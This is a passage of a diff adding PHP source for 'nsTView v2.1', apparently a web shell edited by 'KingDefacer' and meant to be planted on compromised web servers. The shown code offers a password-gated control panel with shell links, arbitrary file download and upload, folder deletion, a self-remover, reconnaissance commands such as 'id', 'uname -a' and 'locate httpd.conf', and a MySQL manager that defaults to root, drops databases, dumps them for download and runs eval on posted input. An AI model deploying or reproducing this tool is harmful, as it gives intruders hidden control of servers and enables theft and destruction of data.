+Is GET installed? (nst) which GET
+Is perl installed? (nst) which perl
+Where is apache (nst) whereis apache
+Where is perl (nst) whereis perl
+locate proftpd.conf (nst) locate proftpd.conf
+locate httpd.conf (nst) locate httpd.conf
+locate my.conf (nst) locate my.conf
+locate psybnc.conf (nst) locate psybnc.conf
+";
+
+
+
+# WINDOWS COMMANDS
+# description (nst) command
+# example: Delete autoexec.bat (nst) del c:\autoexec.bat
+$fast_commands_win = "
+OS Version (nst) ver
+Tasklist  (nst) tasklist
+Attributes in . (nst) attrib
+Show open ports (nst) netstat -an
+";
+
+
+
+
+
+######ver####
+$ver= "v2.1";
+#############
+$pass=$_POST['pass'];
+if($pass==$password){
+$_SESSION['nst']="$pass";
+}
+if ($_SERVER["HTTP_CLIENT_IP"]) $ip = $_SERVER["HTTP_CLIENT_IP"];
+else if($_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
+else if($_SERVER["REMOTE_ADDR"]) $ip = $_SERVER["REMOTE_ADDR"];
+else $ip = $_SERVER['REMOTE_ADDR'];
+$ip=htmlspecialchars($ip);
+
+if($create_password==true){
+
+if(!isset($_SESSION['nst']) or $_SESSION['nst']!=$password){
+die("
+<title>nsTView - Edited By KingDefacer</title>
+<center>
+<table width=100 bgcolor=#D7FFA8 border=1 bordercolor=black><tr><td>
+<font size=1 face=verdana><center>
+<b>nsTView $ver :: <a href=http://alturks.com style='text-decoration:none;'><font color=black>alturks.com</font></a><br></b>
+</center>
+<form method=post>
+Password:<br>
+<input type=password name=pass size=30 tabindex=1>
+</form>
+<b>Host:</b> ".$_SERVER["HTTP_HOST"]."<br>
+<b>IP:</b> ".gethostbyname($_SERVER["HTTP_HOST"])."<br>
+<b>Your ip:</b> ".$ip."
+</td></tr></table>
+");}
+
+}
+$d=$_GET['d'];
+
+function adds($editf){
+#if(get_magic_quotes_gpc()==0){
+$editf=addslashes($editf);
+#}
+return $editf;
+}
+function adds2($editf){
+if(get_magic_quotes_gpc()==0){
+$editf=addslashes($editf);
+}
+return $editf;
+}
+
+$f   = "nst_sql.txt";
+$f_d = $_GET['f_d'];
+
+if($_GET['download']){
+$download=$_GET['download'];
+header("Content-disposition: attachment; filename=\"$download\";");
+readfile("$d/$download");
+exit;}
+
+if($_GET['dump_download']){
+header("Content-disposition: attachment; filename=\"$f\";");
+header("Content-length: ".filesize($f_d."/".$f));
+header("Expires: 0");
+readfile($f_d."/".$f);
+if(is_writable($f_d."/".$f)){
+unlink($f_d."/".$f);
+}
+die;
+}
+
+
+$images=array(".gif",".jpg",".png",".bmp",".jpeg");
+$whereme=getcwd();
+@$d=@$_GET['d'];
+$copyr = "<center><a href=http://alturks.com target=_blank>nsTView $ver<br>o... Network security team ...o</a>";
+$php_self=@$_SERVER['PHP_SELF'];
+if(@eregi("/",$whereme)){$os="unix";}else{$os="win";}
+if(!isset($d)){$d=$whereme;}
+$d=str_replace("\\","/",$d);
+if(@$_GET['p']=="info"){
+@phpinfo();
+exit;}
+if(@$_GET['img']=="1"){
+@$e=$_GET['e'];
+header("Content-type: image/gif");
+readfile("$d/$e");
+}
+if(@$_GET['getdb']=="1"){
+header('Content-type: application/plain-text');
+header('Content-Disposition: attachment; filename=nst-mysql-damp.htm');
+}
+print "<title>nsT View $ver</title>
+<style>
+BODY, TD, TR {
+text-decoration: none;
+font-family: Verdana;
+font-size: 8pt;
+SCROLLBAR-FACE-COLOR: #363d4e;
+SCROLLBAR-HIGHLIGHT-COLOR: #363d4e;
+SCROLLBAR-SHADOW-COLOR: #363d4e;
+SCROLLBAR-ARROW-COLOR: #363d4e;
+SCROLLBAR-TRACK-COLOR: #91AAFF
+}
+input, textarea, select {
+font-family: Verdana;
+font-size: 10px;
+color: black;
+background-color: white;
+border: solid 1px;
+border-color: black
+}
+UNKNOWN {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:link {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:hover {
+COLOR: #FF0C0B;
+TEXT-DECORATION: none
+}
+A:active {
+COLOR: #0006DE;
+TEXT-DECORATION: none
+}
+A:visited {
+TEXT-DECORATION: none
+}
+</style>
+<script>
+function ShowOrHide(d1, d2) {
+if (d1 != '') DoDiv(d1);
+if (d2 != '') DoDiv(d2);}
+
+function DoDiv(id) {
+var item = null;
+if (document.getElementById) {
+item = document.getElementById(id);
+} else if (document.all){
+item = document.all[id];
+} else if (document.layers){
+item = document.layers[id];}
+if (!item) {}
+else if (item.style) {
+if (item.style.display == \"none\"){ item.style.display = \"\"; }
+else {item.style.display = \"none\"; }
+}else{ item.visibility = \"show\"; }}
+
+function cwd(text){
+document.sh311Form.sh3.value+=\" \"+ text;
+document.sh311Form.sh3.focus();
+}
+
+
+</script>
+";
+print "<body vlink=#0006DE>
+<table width=600 border=0 cellpadding=0 cellspacing=1 bgcolor=#D7FFA8 align=center>
+<tr><td><font face=wingdings size=2>0</font>";
+$expl=explode("/",$d);
+$coun=count($expl);
+if($os=="unix"){echo "<a href='$php_self?d=/'>/</a>";}
+else{
+        echo "<a href='$php_self?d=$expl[0]'>$expl[0]/</a>";}
+for($i=1; $i<$coun; $i++){
+        @$xx.=$expl[$i]."/";
+$sls="<a href='$php_self?d=$expl[0]/$xx'>$expl[$i]</a>/";
+$sls=str_replace("//","/",$sls);
+$sls=str_replace("/'></a>/","/'></a>",$sls);
+print $sls;
+}
+if(@ini_get("register_globals")){$reg_g="ON";}else{$reg_g="OFF";}
+if(@ini_get("safe_mode")){$safe_m="ON";}else{$safe_m="OFF";}
+echo "</td></tr>";
+if($os=="unix"){ echo "
+<tr><td><b>id:</b> ".@exec('id')."</td></tr>
+<tr><td><b>uname -a:</b> ".@exec('uname -a')."</td></tr>";} echo"
+<tr><td><b>Your IP: [<font color=#5F3CC1>$ip</font>] Server IP: [<font color=#5F3CC1>".gethostbyname($_SERVER["HTTP_HOST"])."</font>] Server <a href=# title='Host.Domain'>H.D.</a>: [<font color=#5F3CC1>".$_SERVER["HTTP_HOST"]."</font>]</b><br>
+[<b>Safe mode:</b> $safe_m] [<b>Register globals:</b> $reg_g]<br>
+[<a href=# onClick=location.href=\"javascript:history.back(-1)\">Back</a>]
+[<a href='$php_self'>Home</a>]
+[<a href='$php_self?d=$d&sh311=1'>Shell (1)</a> <a href='$php_self?d=$d&sh311=2'>(2)</a>]
+[<a href='$php_self?d=$d&t=upload'>Upload</a>]
+[<a href='$php_self?t=tools'>Tools</a>]
+[<a href='$php_self?p=info'>PHPinfo</a>]
+[<a href='$php_self?delfolder=$d&d=$d&delfl=1&rback=$d' title='$d'>DEL Folder</a>]
+[<a href='$php_self?p=sql'>SQL</a>]
+[<a href='$php_self?p=selfremover'>Self Remover</a>]
+</td></tr>
+";
+if($os=="win"){ echo "
+<tr><td bgcolor=white>
+<center><font face=wingdings size=2><</font>
+<a href='$php_self?d=a:/'>A</a>
+<a href='$php_self?d=b:/'>B</a>
+<a href='$php_self?d=c:/'>C</a>
+<a href='$php_self?d=d:/'>D</a>
+<a href='$php_self?d=e:/'>E</a>
+<a href='$php_self?d=f:/'>F</a>
+<a href='$php_self?d=g:/'>G</a>
+<a href='$php_self?d=h:/'>H</a>
+<a href='$php_self?d=i:/'>I</a>
+<a href='$php_self?d=j:/'>J</a>
+<a href='$php_self?d=k:/'>K</a>
+<a href='$php_self?d=l:/'>L</a>
+<a href='$php_self?d=m:/'>M</a>
+<a href='$php_self?d=n:/'>N</a>
+<a href='$php_self?d=o:/'>O</a>
+<a href='$php_self?d=p:/'>P</a>
+<a href='$php_self?d=q:/'>Q</a>
+<a href='$php_self?d=r:/'>R</a>
+<a href='$php_self?d=s:/'>S</a>
+<a href='$php_self?d=t:/'>T</a>
+<a href='$php_self?d=u:/'>U</a>
+<a href='$php_self?d=v:/'>V</a>
+<a href='$php_self?d=w:/'>W</a>
+<a href='$php_self?d=x:/'>X</a>
+<a href='$php_self?d=y:/'>Y</a>
+<a href='$php_self?d=z:/'>Z</a>
+</td></tr>";}else{echo "<tr><td>&nbsp;</td></tr>";}
+print "<tr><td>
+:: <a href='$php_self?d=$d&mkdir=1'>Create folder</a> ::
+<a href='$php_self?d=$d&mkfile=1'>Create file</a> ::
+<a href='$php_self?d=$d&read_file_safe_mode=1'>Read file if safe mode is On</a> ::";
+if($os=="unix"){
+print "<a href='$php_self?d=$d&ps_table=1'>PS table</a> ::";
+}
+print "</td></tr>";
+
+
+
+
+
+if($_GET['p']=="ftp"){
+print "<tr><td>";
+
+
+
+print "</td></tr></table>";
+print $copyr;
+exit;
+}
+
+
+
+
+
+
+
+
+
+
+if(@$_GET['p']=="sql"){
+print "<tr><td>";
+###
+
+$f_d = $_GET['f_d'];
+if(!isset($f_d)){$f_d=".";}
+if($f_d==""){$f_d=".";}
+
+$php_self=$_SERVER['PHP_SELF'];
+$delete_table=$_GET['delete_table'];
+$tbl=$_GET['tbl'];
+$from=$_GET['from'];
+$to=$_GET['to'];
+$adress=$_POST['adress'];
+$port=$_POST['port'];
+$login=$_POST['login'];
+$pass=$_POST['pass'];
+$adress=$_GET['adress'];
+$port=$_GET['port'];
+$login=$_GET['login'];
+$pass=$_GET['pass'];
+$conn=$_GET['conn'];
+if(!isset($adress)){$adress="localhost";}
+if(!isset($login)){$login="root";}
+if(!isset($pass)){$pass="";}
+if(!isset($port)){$port="3306";}
+if(!isset($from)){$from=0;}
+if(!isset($to)){$to=50;}
+
+
+?>
+<style>
+table,td{
+color: black;
+font-face: verdana;
+font-size: 11px;
+
+}
+</style>
+<font color=black face=verdana size=1>
+<? if(!$conn){ ?>
+
+<!-- table 1 -->
+<table bgcolor=#D7FFA8>
+<tr><td valign=top>Address:</td><td><form><input name=adress value='<?=$adress?>' size=20><input name=port value='<?=$port?>' size=6></td></tr>
+<tr><Td valign=top>Login: </td><td><input name=login value='<?=$login?>' size=10></td></tr>
+<tr><Td valign=top>Pass:</td><td> <input name=pass value='<?=$pass?>' size=10><input type=hidden name=p value=sql></td></tr>
+<tr><td></td><td><input type=submit name=conn value=Connect></form></td></tr><?}?>
+<tr><td valign=top><? if($conn){ echo "<b>PHP v".@phpversion()."<br>mySQL v".@mysql_get_server_info()."<br>";}?></b></td><td></td></tr>
+</table>
+<!-- end of table 1 -->
+
+
+<?
+$conn=$_GET['conn'];
+$adress=$_GET['adress'];
+$port=$_GET['port'];
+$login=$_GET['login'];
+$pass=$_GET['pass'];
+if($conn){
+
+$serv = @mysql_connect($adress.":".$port, $login,$pass) or die("<font color=red>Error: ".mysql_error()."</font>");
+if($serv){$status="Connected. :: <a href='$php_self?p=sql'>Log out</a>";}else{$status="Disconnected.";}
+print "<b><font color=green>Status: $status<br><br>"; # #D7FFA8
+print "<table cellpadding=0 cellspacing=0 bgcolor=#D7FFA8><tr><td valign=top>";
+print "<br><font color=red>[db]</font><Br>";
+print "<font color=white>";
+$res = mysql_list_dbs($serv);
+while ($str=mysql_fetch_row($res)){
+print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&delete_db=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")'>[DEL]<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$str[0]&dump_db=$str[0]&f_d=$d'>[DUMP]</a></a> <b><a href='$php_self?baza=1&db=$str[0]&p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a></b><br>";
+$tc++;
+}
+$baza=$_GET['baza'];
+$db=$_GET['db'];
+print "<font color=red>[Total db: $tc]</font><br>";
+if($baza){
+print "<div align=left><font color=green>db: [$db]</div></font><br>";
+$result=@mysql_list_tables($db);
+while($str=@mysql_fetch_array($result)){
+$c=mysql_query ("SELECT COUNT(*) FROM $str[0]");
+$records=mysql_fetch_array($c);
+
+if(strlen($str[0])>$s4ot){$s4ot=strlen($str[0]);}
+if($records[0]=="0"){
+print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&delete_table=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")' title='Delete $str[0]?'>[D]</a><a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$str[0]' title='Rename $str[0]'>[R]</a><font color=red>[$records[0]]</font> <a href='$php_self?vnutr=1&p=sql&vn=$str[0]&baza=1&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]&ins_new_line=1'>$str[0]</a><br>";
+}else{
+print "<a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&delete_table=$str[0]' onclick='return confirm(\"DELETE $str[0] ?\")' title='Delete $str[0]?'>[D]</a><a href='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$str[0]' title='Rename $str[0]'>[R]</a><font color=red>[$records[0]]</font> <a href='$php_self?vnutr=1&p=sql&vn=$str[0]&baza=1&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$str[0]'>$str[0]</a><br>";
+}
+mysql_free_result($c);
+$total_t++;
+}
+print "<br><B><font color=red>Total tables: $total_t</font></b>";
+                                print "<pre>";
+for($i=0; $i<$s4ot+10; $i++){print "&nbsp;";}
+                                print "</pre>";
+} #end baza
+
+
+
+
+# delete table
+if(isset($delete_table)){
+mysql_select_db($_GET['db']) or die("<font color=red>".mysql_error()."</font>");
+mysql_query("DROP TABLE IF EXISTS $delete_table") or die("<font color=red>".mysql_error()."</font>");
+print "<br><b><font color=green>Table [ $delete_table ] :: Deleted success!</font></b>";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1\">";
+}
+# end of delete table
+
+# delete database
+if(isset($_GET['delete_db'])){
+mysql_drop_db($_GET['delete_db']) or die("<font color=red>".mysql_error()."</font>");
+print "<br><b><font color=green>Database ".$_GET['delete_db']." :: Deleted Success!";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1\">";
+}
+# end of delete database
+
+# delete row
+if(isset($_POST['delete_row'])){
+$_POST['delete_row'] = base64_decode($_POST['delete_row']);
+mysql_query("DELETE FROM ".$_GET['tbl']." WHERE ".$_POST['delete_row']) or die("<font color=red>".mysql_error()."</font>");
+$del_result = "<br><b><font color=green>Deleted Success!<br>".$_POST['delete_row'];
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
+}
+# end of delete row
+
+
+$vn=$_GET['vn'];
+print "</td><td valign=top>";
+print "<font color=green>Database: $db => $vn</font>";
+
+# edit row
+if(isset($_POST['edit_row'])){
+$edit_row=base64_decode($_POST['edit_row']);
+
+$r_edit = mysql_query("SELECT * FROM $tbl WHERE $edit_row") or die("<font color=red>".mysql_error()."</font>");
+print "<br><br>
+       <table border=0 cellpadding=1 cellspacing=1><tr>
+       <td><b>Row</b></td><td><b>Value</b></td></tr>";
+print  "<form method=post action='$php_self?p=sql&login=".$_GET['login']."&pass=".$_GET['pass']."&adress=".$_GET['adress']."&conn=1&baza=1&tbl=".$_GET['tbl']."&vn=".$_GET['vn']."&db=".$_GET['db']."'>";
+print  "<input type=hidden name=edit_row value='".$_POST['edit_row']."'>";
+print " <input type=radio name=upd value=update checked>Update<br>
+        <input type=radio name=upd value=insert>Insert new<br><br>";
+
+
+$i=0;
+while($mn = mysql_fetch_array($r_edit, MYSQL_ASSOC)){
+foreach($mn as $key =>$val){
+$type  = mysql_field_type($r_edit, $i);
+$len  = mysql_field_len($r_edit, $i);
+$del .= "`$key`='".adds($val)."' AND ";
+$c=strlen($val);
+$val=htmlspecialchars($val, ENT_NOQUOTES);
+$str=" <textarea name='$key' cols=39 rows=5>$val</textarea> ";
+$buff .= "<tr><td bgcolor=silver><b>$key</b><br><font color=green>(<b>$type($len)</b>)</font></td><td>$str</td></tr>";
+$i++;
+}
+
+}
+$delstring=base64_encode($del);
+print "<input type=hidden name=delstring value=\"$delstring\">";
+print "$buff</table><br>";
+print "<br>";
+if(!$_POST['makeupdate']){print "<input type=submit value=Update name=makeupdate></form>";}
+
+
+
+
+if($_POST['makeupdate']){
+if($_POST['upd']=='update'){
+preg_match_all("/name='(.*?)'\scols=39\srows=5>(.*?)<\/textarea>/i",$buff,$matches3);
+$delstring=$_POST['delstring'];
+$delstring=base64_decode($delstring);
+$delstring = substr($delstring, 0, strlen($delstring)-5);
+
+for($i=0; $i<count($matches3[0]); $i++){
+eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
+$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',";
+}
+$total_str = substr_replace($total_str,"",-1);
+$up_string = "UPDATE `$tbl` SET $total_str WHERE $delstring";
+$up_string = htmlspecialchars($up_string, ENT_NOQUOTES);
+print "<b>PHP var:<br></b>\$sql=\"$up_string\";<br><br>";
+
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
+mysql_query($up_string) or die("<font color=red>".mysql_error()."</font>");
+}#end of make update
+
+
+
+if($_POST['upd']=='insert'){
+preg_match_all("/name='(.*?)'\scols=39\srows=5>(.*?)<\/textarea>/i",$buff,$matches3);
+$delstring=$_POST['delstring'];
+$delstring=base64_decode($delstring);
+$delstring = substr($delstring, 0, strlen($delstring)-5);
+
+for($i=0; $i<count($matches3[0]); $i++){
+eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
+$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',,";
+}
+
+$total_str = ",,".$total_str;
+
+preg_match_all("/,(.*?)='(.*?)',/i",$total_str,$matches4);
+
+for($i=0; $i<count($matches4[1]); $i++){
+        $matches4[1][0]=str_replace(",","",$matches4[1][0]);
+        $total_m_i .= "`".$matches4[1][$i]."`,";
+        $total_m_x .= "'".$matches4[2][$i]."',";
+}
+$total_m_i = substr($total_m_i, 0, strlen($total_m_i)-1);
+$total_m_x = substr($total_m_x, 0, strlen($total_m_x)-1);
+
+$make_insert="INSERT INTO `$tbl` ($total_m_i) VALUES ($total_m_x)";
+mysql_query($make_insert) or die("<font color=red>".mysql_error()."</font>");
+print "<b>PHP var:<br></b>\$sql=\"$make_insert\";<br><br>";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
+}#end of insert
+}#end of update
+}
+# end of edit row
+
+
+# insert new line
+if($_GET['ins_new_line']){
+$qn = mysql_query('SHOW FIELDS FROM '.$tbl) or die("<font color=red>".mysql_error()."</font>");
+print "<form method=post action='$php_self?p=sql&login=".$_GET['login']."&pass=".$_GET['pass']."&adress=".$_GET['adress']."&conn=1&baza=1&tbl=".$_GET['tbl']."&vn=".$_GET['vn']."&db=".$_GET['db']."&ins_new_line=1'>
+Insert new line in <b>$tbl</b> table</b><Br><br>";
+print "<table>";
+while ($new_line = mysql_fetch_array($qn, MYSQL_ASSOC)) {
+foreach ($new_line as $key =>$next) {
+$buff .= "$next ";
+}
+$expl=explode(" ",$buff);
+$buff2 .= $expl[0]." ";
+print "<tr><td bgcolor=silver><b>$expl[0]</b><br><font color=green>(<b>$expl[1]</b>)</font></td>
+<td><textarea name='$expl[0]' cols=39 rows=5></textarea>
+</td></tr>";
+unset($buff);
+}
+print "</table>
+<center><input type=submit value=Insert name=mk_ins></form></center>";
+if($_POST['mk_ins']){
+preg_match_all("/(.*?)\s/i",$buff2,$matches3);
+for($i=0; $i<count($matches3[0]); $i++){
+eval("\$".$matches3[1][$i]." = \"".adds2($_POST[$matches3[1][$i]])."\";");
+$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',,";
+}
+
+$total_str = ",,".$total_str;
+preg_match_all("/,(.*?)='(.*?)',/i",$total_str,$matches4);
+
+for($i=0; $i<count($matches4[1]); $i++){
+        $matches4[1][0]=str_replace(",","",$matches4[1][0]);
+        $total_m_i .= "`".$matches4[1][$i]."`,";
+        $total_m_x .= "'".$matches4[2][$i]."',";
+}
+$total_m_i = substr($total_m_i, 0, strlen($total_m_i)-1);
+$total_m_x = substr($total_m_x, 0, strlen($total_m_x)-1);
+
+$make_insert="INSERT INTO `$tbl` ($total_m_i) VALUES ($total_m_x)";
+mysql_query($make_insert) or die("<font color=red>".mysql_error()."</font>");
+print "<b>PHP var:<br></b>\$sql=\"$make_insert\";<br><br>";
+print "<meta http-equiv=\"REFRESH\" content=\"5;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&vnutr=1&baza=1&vn=".$_GET['vn']."&db=$db&tbl=$tbl\">";
+}#end of mk ins
+}#end of ins new line
+
+
+
+
+
+
+if(isset($_GET['rename_table'])){
+$rename_table=$_GET['rename_table'];
+print "<br><br>Rename <b>$rename_table</b> to<br><br>
+<form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&db=$db&baza=1&rename_table=$rename_table'>
+<input name=new_name size=30><center><br>
+<input type=submit value=Rename></center>
+</form>
+";
+
+if(isset($_POST['new_name'])){
+mysql_select_db($db) or die("<font color=red>".mysql_error()."</font>");
+mysql_query("RENAME TABLE $rename_table TO ".$_POST['new_name']) or die("<font color=red>".mysql_error()."</font>");
+print "<br><font color=green>Table <b>$rename_table</b> renamed to <b>".$_POST['new_name']."</b></font>";
+print "<meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&db=$db\">";
+}
+
+}#end of rename
+
+
+# dump table
+if($_GET['dump']){
+if(!is_writable($f_d)){die("<br><br><font color=red>This folder $f_d isnt writable!<br>Cannot make dump.<br><br>
+<font color=green><b>You can change temp folder for dump file in your browser!<br>
+<font color=red>Change variable &f_d=(here writable directory, expl: /tmp or c:/windows/temp)</font><br>
+Then press enter</b></font>
+</font>");}
+mysql_select_db($db) or die("<font color=red>".mysql_error()."</font>");
+$fp = fopen($f_d."/".$f,"w");
+fwrite($fp, "# nsTView.php v$ver
+# Web: http://alturks.com
+# Dump from: ".$_SERVER["SERVER_NAME"]." (".$_SERVER["SERVER_ADDR"].")
+# MySQL version: ".mysql_get_server_info()."
+# PHP version: ".phpversion()."
+# Date: ".date("d.m.Y - H:i:s")."
+# Dump db ( $db ) Table ( $tbl )
+# --- eof ---
+
+");
+$que = mysql_query("SHOW CREATE TABLE `$tbl`") or die("<font color=red>".mysql_error()."</font>");
+$row = mysql_fetch_row($que);
+fwrite($fp, "DROP TABLE IF EXISTS `$tbl`;\r\n");
+$row[1]=str_replace("\n","\r\n",$row[1]);
+fwrite($fp, $row[1].";\r\n\r\n");
+$que = mysql_query("SELECT * FROM `$tbl`");
+if(mysql_num_rows($que)>0){
+while($row = mysql_fetch_assoc($que)){
+$keys = join("`, `", array_keys($row));
+$values = array_values($row);
+foreach($values as $k=>$v) {$values[$k] = adds2($v);}
+$values = implode("', '", $values);
+$sql = "INSERT INTO `$tbl`(`$keys`) VALUES ('".$values."');\r\n";
+fwrite($fp, $sql);
+}
+}
+fclose($fp);
+print "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&dump_download=1&f_d=$f_d/\">";
+}#end of dump
+
+
+
+
+# db dump
+if($_GET['dump_db']){
+$c=mysql_num_rows(mysql_list_tables($db));
+if($c>=1){
+print "<br><br>&nbsp;&nbsp;&nbsp;Dump database <b>$db</b>";
+}else{
+print "<br><br><font color=red>Cannot dump database. No tables exists in <b>$db</b> db.</font>";
+die;
+}
+if(sizeof($tabs)==0){
+$res = mysql_query("SHOW TABLES FROM $db");
+if(mysql_num_rows($res)>0){
+while($row=mysql_fetch_row($res)){
+$tabs[] .= $row[0];
+}
+}
+}
+$fp = fopen($f_d."/".$f,"w");
+fwrite($fp, "# nsTView.php v$ver
+# Web: http://alturks.com
+# Dump from: ".$_SERVER["SERVER_NAME"]." (".$_SERVER["SERVER_ADDR"].")
+# MySQL version: ".mysql_get_server_info()."
+# PHP version: ".phpversion()."
+# Date: ".date("d.m.Y - H:i:s")."
+# Dump db ( $db )
+# --- eof ---
+
+");
+foreach($tabs as $tab) {
+fwrite($fp,"DROP TABLE IF EXISTS `$tab`;\r\n");
+$res = mysql_query("SHOW CREATE TABLE `$tab`");
+$row = mysql_fetch_row($res);
+$row[1]=str_replace("\n","\r\n",$row[1]);
+fwrite($fp, $row[1].";\r\n\r\n");
+$res = mysql_query("SELECT * FROM `$tab`");
+if(mysql_num_rows($res)>0){
+while($row=mysql_fetch_assoc($res)){
+$keys = join("`, `", array_keys($row));
+$values = array_values($row);
+foreach($values as $k=>$v) {$values[$k] = adds2($v);}
+$values = join("', '", $values);
+$sql = "INSERT INTO `$tab`(`$keys`) VALUES ('$values');\r\n";
+fwrite($fp, $sql);
+}}
+fwrite($fp, "\r\n\r\n\r\n");
+}
+fclose($fp);
+print "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&dump_download=1&f_d=$f_d/\">";
+}#end of db dump
+
+
+
+
+
+
+$vnutr=$_GET['vnutr'];
+$tbl=$_GET['tbl'];
+if($vnutr and !$_GET['ins_new_line']){
+print "<table cellpadding=0 cellspacing=1><tr><td>";
+
+mysql_select_db($db) or die(mysql_error());
+$c=mysql_query ("SELECT COUNT(*) FROM $tbl");
+$cfa=mysql_fetch_array($c);
+mysql_free_result($c);
+print "
+Total: $cfa[0]
+<form>
+From: <input name=from size=3 value=0>
+To: <input name=to size=3 value='$cfa[0]'>
+<input type=submit name=show value=Show>
+<input type=hidden name=vnutr value=1>
+<input type=hidden name=vn value='$vn'>
+<input type=hidden name=db value='$db'>
+<input type=hidden name=login value='$login'>
+<input type=hidden name=pass value='$pass'>
+<input type=hidden name=adress value='$adress'>
+<input type=hidden name=conn value=1>
+<input type=hidden name=baza value=1>
+<input type=hidden name=p value=sql>
+<input type=hidden name=tbl value='$tbl'>
+ [<a href='$php_self?getdb=1&to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl'>DOWNLOAD</a>] [<a href='$php_self?to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl&ins_new_line=1'>INSERT</a>] [<a href='$php_self?to=$cfa[0]&vnutr=1&vn=$vn&db=$db&login=$login&pass=$pass&adress=$adress&conn=1&baza=1&p=sql&tbl=$tbl&dump=1&f_d=$d'>DUMP</a>]
+</form></td></tr></table>";
+$vn=$_GET['vn'];
+$from=$_GET['from'];
+$to=$_GET['to'];
+$from=$_GET['from'];
+$to=$_GET['to'];
+if(!isset($from)){$from=0;}
+if(!isset($to)){$to=50;}
+$query = "SELECT * FROM $vn LIMIT $from,$to";
+$result = mysql_query($query);
+$result1= mysql_query($query);
+print $del_result;
+print "<table cellpadding=0 cellspacing=1 border=1><tr><td></td>";
+for ($i=0;$i<mysql_num_fields($result);$i++){
+$name=mysql_field_name($result,$i);
+$type  = mysql_field_type($result, $i);
+$len  = mysql_field_len($result, $i);
+print "<td bgcolor=#BCE0FF> $name (<b>$type($len)</b>)</td>";
+}
+print "</tr><pre>";
+
+while($mn = mysql_fetch_array($result, MYSQL_ASSOC)){
+foreach($mn as $key=>$inside){
+$buffer1 .= "`$key`='".adds($inside)."' AND ";
+$b1 .= "<td>".htmlspecialchars($inside, ENT_NOQUOTES)."&nbsp;</td>";
+}
+$buffer1  = substr($buffer1, 0, strlen($buffer1)-5);
+$buffer1  = base64_encode($buffer1);
+print "<td>
+<form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$tbl&vnutr=1&baza=1&vn=$vn&db=$db'>
+<input type=hidden name=delete_row value='$buffer1'>
+<input type=submit value=Del onclick='return confirm(\"DELETE ?\")' style='border:1px; background-color:white;'>
+</form><form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$tbl&baza=1&vn=$vn&db=$db'>
+<input type=hidden name=edit_row value='$buffer1'>
+<input type=submit value=Edit style='border:1px;background-color:green;'>
+</form>
+</td>\r\n";
+print $b1;
+print "</tr>";
+unset($b1);
+unset($buffer1);
+}
+
+
+
+mysql_free_result($result);
+print "</table>";
+} #end vnutr
+print "</td></tr></table>";
+} # end $conn
+
+
+###   end of sql
+print "</tr></td></table> </td></tr></table>";
+print $copyr;
+die;
+}
+
+
+@$p=$_GET['p'];
+if(@$_GET['p']=="selfremover"){
+        print "<tr><td>";
+print "<font color=red face=verdana size=1>Are you sure?<br>
+<a href='$php_self?p=yes'>Yes</a> | <a href='$php_self?'>No</a><br>
+Remove: <u>";
+$path=__FILE__;
+print $path;
+print " </u>?</td></tr></table>";
+die;
+}
+
+if($p=="yes"){
+$path=__FILE__;
+@unlink($path);
+$path=str_replace("\\","/",$path);
+if(file_exists($path)){$hmm="NOT DELETED!!!";
+print "<tr><td><font color=red>FILE $path NOT DELETED</td></tr>";
+}else{$hmm="DELETED";}
+print "<script>alert('$path $hmm');</script>";
+
+}
+
+
+
+if($os=="unix"){
+function fastcmd(){
+global $fast_commands;
+$c_f=explode("\n",$fast_commands);
+$c_f=count($c_f)-2;
+print "
